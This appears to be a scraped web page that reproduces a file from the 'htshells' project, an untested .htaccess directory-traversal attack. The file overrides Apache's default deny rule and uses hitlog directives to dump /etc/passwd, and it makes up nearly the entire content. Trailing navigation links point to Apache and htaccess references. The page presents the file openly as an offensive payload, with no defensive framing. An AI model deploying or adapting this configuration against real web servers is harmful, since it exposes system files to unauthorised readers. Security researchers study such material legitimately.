0xBADCA7/htshells/master/traversal/mod_hitlog.traversal.htaccess

# Untested
# Self contained .htaccess directory traversal attack - Part of the htshell project
# Written by Wireghoul - http://www.justanotherhacker.com
# This attack will dump /etc/password
# Override default deny rule to make .htaccess file accessible over web
<Files ~ "^.ht">
# Uncomment the line below for Apache2.4 and newer
# Require all granted
    Order allow,deny
    Allow from all
</Files>

# Enable hitlog
HitlogEnabled On

# Specify file to read
HitlogCodePath /etc/passwd

# Specify a tag to append the code to
HitlogHtmlTal <traversal>

# And finally trigger the attack (although the above should already have done so): <traversal>

On Github License

Files

Download PDF of Htaccess file

Comments

Apache

Htaccess Tutorial
Apache Directive Index
Directive Reference
twitter.com/htaccess